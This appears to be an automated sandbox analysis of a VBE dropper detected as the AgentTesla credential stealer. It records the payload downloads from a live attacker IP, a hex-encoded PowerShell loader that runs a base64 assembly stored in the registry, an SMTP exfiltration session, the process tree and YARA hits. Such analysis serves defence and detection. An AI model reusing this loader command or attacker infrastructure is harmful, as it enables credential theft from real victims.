                                                                Oct 22, 2024 14:46:04.589106083 CEST | 1236 | IN | Data Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                                Data Ascii: 1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414145494155792F41414141414141417378475A7555575A793932597A314741756C
                                                                Oct 22, 2024 14:46:04.589116096 CEST | 1236 | IN | Data Raw: 43 34 43 37 41 35 36 33 32 35 39 37 39 35 36 33 33 36 32 37 41 35 36 36 44 35 35 37 35 33 30 35 37 35 41 33 30 34 45 35 38 36 35 35 34 37 38 34 37 34 31 34 31 34 31 35 31 36 42 34 31 34 31 34 31 34 32 33 34 33 37 33 37 34 42 33 37 34 44 34
                                                                Data Ascii: C4C7A563259795633627A566D557530575A304E5865547847414141516B41414141423437374B374D4141414174414177636E3557613052585A543553654E74414142414241414D585A6A6C6D647956325569563256756B58544F4151415441414179563263563553654E644141427741414134326270525859
                                                                Oct 22, 2024 14:46:04.589122057 CEST | 1236 | IN | Data Raw: 37 35 32 36 38 34 34 35 35 34 32 35 31 34 31 37 39 33 34 37 39 34 45 37 35 35 31 36 41 36 34 33 39 33 34 33 32 36 32 37 30 34 45 36 45 36 33 36 43 35 41 34 36 34 43 37 32 34 41 33 33 36 32 33 33 35 36 35 37 36 32 36 38 34 41 36 45 35 32 35 35 35
                                                                Data Ascii: 7526844554251417934794E75516A6439343262704E6E636C5A464C724A336233565762684A6E5255566B54757742414230454141416A4C7734434D75457A42414541444141774E7A516A5A326754593449544F6C6C544C30677A4D69316959336B444E744D6D4E7863544C32517A4D6D5A7A4E3167444A4145
                                                                Oct 22, 2024 14:46:04.589391947 CEST | 1236 | IN | Data Raw: 46 34 35 34 32 34 31 36 39 34 32 34 46 36 42 36 44 34 35 34 32 34 31 35 33 34 32 34 36 33 30 35 32 36 44 34 31 34 42 35 32 34 31 36 37 36 33 35 31 37 38 34 31 34 42 34 32 34 31 34 31 35 35 36 37 34 34 34 46 34 35 34 31 34 31 34 35 37 37 36 38 34
                                                                Data Ascii: F45424169424F6B6D45424153424630526D414B524167635178414B4241415567444F4541414577684442414142494551414151516A414B52426449774248454141414D67444245414145344141674D516A414B5241424167424F775241675167414F6B496753494149483467444F494141466B496753594142
                                                                Oct 22, 2024 14:46:04.594352007 CEST | 1236 | IN | Data Raw: 31 36 37 34 38 34 31 36 43 34 32 37 37 34 41 34 31 33 34 34 37 34 31 36 37 34 31 35 31 35 41 34 31 36 42 34 46 34 31 37 30 34 32 36 37 35 41 34 31 36 42 34 37 34 31 36 41 34 32 35 31 33 36 34 31 34 31 34 38 34 31 37 41 34 32 34 31 34 39 34 31 35
                                                                Data Ascii: 16748416C42774A413447416741515A416B4F417042675A416B47416A425136414148417A4241494155474179424164414D48417042775A4155474179424149415547416B424149416B4F41734277594141434168424154564241416342515A4149484168427764415148416D427762414D3145414177634155
                                                                Oct 22, 2024 14:46:04.765830994 CEST | 152 | OUT | GET /1210/r HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:05.021224976 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:04 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                                                ETag: "9800-62404d5968a93"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 38912
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                                                Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                                Oct 22, 2024 14:46:05.246551037 CEST | 175 | OUT | GET /1210/thEh4UQ3nf0RsZGPSynf.txt HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:05.502326012 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:05 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Tue, 22 Oct 2024 06:53:19 GMT
                                                                ETag: "75400-6250b3976cad7"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 480256
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: text/plain
                                                                Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                                                Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                                Oct 22, 2024 14:46:06.189971924 CEST | 152 | OUT | GET /1210/v HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:06.531855106 CEST | 761 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:06 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                                                ETag: "1de-622f3802a248c"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 478
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                                                                Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D622E627B5D7D3A3A627B287D277C706174687C277B297D
                                                                Oct 22, 2024 14:46:06.621951103 CEST | 155 | OUT | GET /1210/file HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:06.877648115 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:06 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Wed, 02 Oct 2024 01:14:12 GMT
                                                                ETag: "15aa-6237427da239f"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 5546
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.5 | 49751 | 104.26.13.205 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2024-10-22 12:46:28 UTC | 155 | OUT | GET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                Host: api.ipify.org
                                                                Connection: Keep-Alive
                                                                2024-10-22 12:46:28 UTC | 211 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:28 GMT
                                                                Content-Type: text/plain
                                                                Content-Length: 14
                                                                Connection: close
                                                                Vary: Origin
                                                                CF-Cache-Status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 8d699725691b46cb-DFW
                                                                2024-10-22 12:46:28 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                                                                Data Ascii: 173.254.250.76


                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                Oct 22, 2024 14:46:30.533571005 CEST | 587 | 49764 | 162.254.34.31 | 192.168.2.5 | 220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                                Oct 22, 2024 14:46:30.536145926 CEST | 49764 | 587 | 192.168.2.5 | 162.254.34.31 | EHLO 473627
                                                                Oct 22, 2024 14:46:30.698116064 CEST | 587 | 49764 | 162.254.34.31 | 192.168.2.5 | 250-server1.educt.shop127.0.0.1
                                                                    250-PIPELINING
                                                                    250-SIZE 204800000
                                                                    250-ETRN
                                                                    250-STARTTLS
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-AUTH=PLAIN LOGIN
                                                                    250-ENHANCEDSTATUSCODES
                                                                    250-8BITMIME
                                                                    250-DSN
                                                                    250 CHUNKING
                                                                Oct 22, 2024 14:46:30.704118013 CEST | 49764 | 587 | 192.168.2.5 | 162.254.34.31 | AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                Oct 22, 2024 14:46:30.866111040 CEST | 587 | 49764 | 162.254.34.31 | 192.168.2.5 | 334 UGFzc3dvcmQ6
                                                                Oct 22, 2024 14:46:31.045274973 CEST | 587 | 49764 | 162.254.34.31 | 192.168.2.5 | 235 2.7.0 Authentication successful
                                                                Oct 22, 2024 14:46:31.045531034 CEST | 49764 | 587 | 192.168.2.5 | 162.254.34.31 | MAIL FROM:<sendxambro@educt.shop>
                                                                Oct 22, 2024 14:46:31.209078074 CEST | 587 | 49764 | 162.254.34.31 | 192.168.2.5 | 250 2.1.0 Ok
                                                                Oct 22, 2024 14:46:31.210385084 CEST | 49764 | 587 | 192.168.2.5 | 162.254.34.31 | RCPT TO:<ambro@educt.shop>
                                                                Oct 22, 2024 14:46:31.375787973 CEST | 587 | 49764 | 162.254.34.31 | 192.168.2.5 | 250 2.1.5 Ok
                                                                Oct 22, 2024 14:46:31.375917912 CEST | 49764 | 587 | 192.168.2.5 | 162.254.34.31 | DATA
                                                                Oct 22, 2024 14:46:31.537045002 CEST | 587 | 49764 | 162.254.34.31 | 192.168.2.5 | 354 End data with <CR><LF>.<CR><LF>
                                                                Oct 22, 2024 14:46:31.537789106 CEST | 49764 | 587 | 192.168.2.5 | 162.254.34.31 | .
                                                                Oct 22, 2024 14:46:31.704010010 CEST | 587 | 49764 | 162.254.34.31 | 192.168.2.5 | 250 2.0.0 Ok: queued as 4907E60E81


                                                                Target ID:0
                                                                Start time:08:46:02
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe"
                                                                Imagebase:0x7ff644100000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:08:46:06
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs"
                                                                Imagebase:0x7ff644100000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:3
                                                                Start time:08:46:07
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:08:46:08
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:08:46:23
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:08:46:23
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:08:46:26
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0x2a0000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3315071411.0000000002727000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:10
                                                                Start time:08:46:27
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\wermgr.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0"
                                                                Imagebase:0x7ff6070d0000
                                                                File size:229'728 bytes
                                                                MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:08:46:27
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\wermgr.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0"
                                                                Imagebase:0x7ff6070d0000
                                                                File size:229'728 bytes
                                                                MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:10.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:184
                                                                  Total number of Limit Nodes:19

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-3356825164
                                                                  • Opcode ID: 24c59835d6420de3963328f68d3bc23527e79288c0c13fa8d9431014366f3a3c
                                                                  • Instruction ID: 289bd164b2e67df206e3492af3f83574f5e9d478457375d0f5cc882377535a98
                                                                  • Opcode Fuzzy Hash: 24c59835d6420de3963328f68d3bc23527e79288c0c13fa8d9431014366f3a3c
                                                                  • Instruction Fuzzy Hash: 2A324D31E10719CFCB58EF65C8946AEB7B2FFC9300F11C6A9D409A7264EB70A985CB51

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq
                                                                  • API String ID: 0-3720491408
                                                                  • Opcode ID: 7e6e256c95655a6a546b8b3a6e89c7304df81e6db1df5656fba5f3ce9b4ff3ff
                                                                  • Instruction ID: bf9cdf0f664f78a137dab1b5fdc5a8e3a9d0b2df353333e57848c5c190dd7c8b
                                                                  • Opcode Fuzzy Hash: 7e6e256c95655a6a546b8b3a6e89c7304df81e6db1df5656fba5f3ce9b4ff3ff
                                                                  • Instruction Fuzzy Hash: 2B02BE31B002158FCB94DB69D594AAEBBF6FF84300F11C529D8059B399EB35ED86CB80

                                                                  Control-flow Graph

                                                                  control_flow_graph: basic-block graph for the function starting at 97e270 (entry block 97e270-97e292; rendered graph and edge list not reproduced in text)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Xnq$$jq
                                                                  • API String ID: 0-65531410
                                                                  • Opcode ID: 7079d57cdd425bfbe34defa187ffbfe5b5e4f010d902e2405849d935ac2d104c
                                                                  • Instruction ID: 1c9168a79370e0067ad5a3ffb5577878e1f5986d2aa6f2f364df8748c58935d0
                                                                  • Opcode Fuzzy Hash: 7079d57cdd425bfbe34defa187ffbfe5b5e4f010d902e2405849d935ac2d104c
                                                                  • Instruction Fuzzy Hash: D0B1C531B042189FDB18AB79985567E7BA7BFC8700B14C96ED40BD7399DE38DC028B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d8b00a733d1a754dc1ad6a1818fbbaa380d53cded15d4a15c626f67511a3fbd
                                                                  • Instruction ID: 72615a6c6b047df7b671877a0eb004d3237034b7b3d3aa0ecff213182e2ff03d
                                                                  • Opcode Fuzzy Hash: 2d8b00a733d1a754dc1ad6a1818fbbaa380d53cded15d4a15c626f67511a3fbd
                                                                  • Instruction Fuzzy Hash: 2353E571D10B1A8ACB51EF68C8846A9F7B1FF99300F51D79AE45877121FB70AAC4CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e752bc9da3cb93cbb4831124d953d1712f6fd1edb94a99ef08ac5420fc621ca1
                                                                  • Instruction ID: 8331ec78776c437512c7ff120fb3fed0e944125d3ba0955357ab053fe5b2833a
                                                                  • Opcode Fuzzy Hash: e752bc9da3cb93cbb4831124d953d1712f6fd1edb94a99ef08ac5420fc621ca1
                                                                  • Instruction Fuzzy Hash: 3F922734A002048FDBA4DF68C584A6EBBF2EF45314F5684A9D849EB365DB35ED85CF80
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 292e7887ed641d031237a79403f4f6b1ebf2303548d2b154fde3c26c9d8138cf
                                                                  • Instruction ID: 13c9909bafc7ad2f8f2beb06ec7f8a2b3a6d0dbb60c008fec5a662f33c29bb22
                                                                  • Opcode Fuzzy Hash: 292e7887ed641d031237a79403f4f6b1ebf2303548d2b154fde3c26c9d8138cf
                                                                  • Instruction Fuzzy Hash: 4C62AE35E102088FDB94DB68D584AAEBBF6EF88310F558569E805DB364DB36ED41CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 342c9a0bae074e9af4f679cced44188dc6cabd558078ee0d5201c1879661ecad
                                                                  • Instruction ID: aad7ca2ee2d4300f4832d1107ccaff3309625365ae26f6327caaf80d011edbb4
                                                                  • Opcode Fuzzy Hash: 342c9a0bae074e9af4f679cced44188dc6cabd558078ee0d5201c1879661ecad
                                                                  • Instruction Fuzzy Hash: 46329335A502098FEF94DB68D580BAEBBF6EF88314F118529E805E7355DB34EC81CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e24e942740715ea5eb890fffdf4a15459f6e01b224cc2d415ef42211bf2c0462
                                                                  • Instruction ID: 930ab80e589c47718e776133566aec05aff7afe0721338d7bb11f31bc87b3480
                                                                  • Opcode Fuzzy Hash: e24e942740715ea5eb890fffdf4a15459f6e01b224cc2d415ef42211bf2c0462
                                                                  • Instruction Fuzzy Hash: 1612C171F402058BDFA1DB64D88066FBBF6EF84320F258429D85A9B395DB34ED41CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
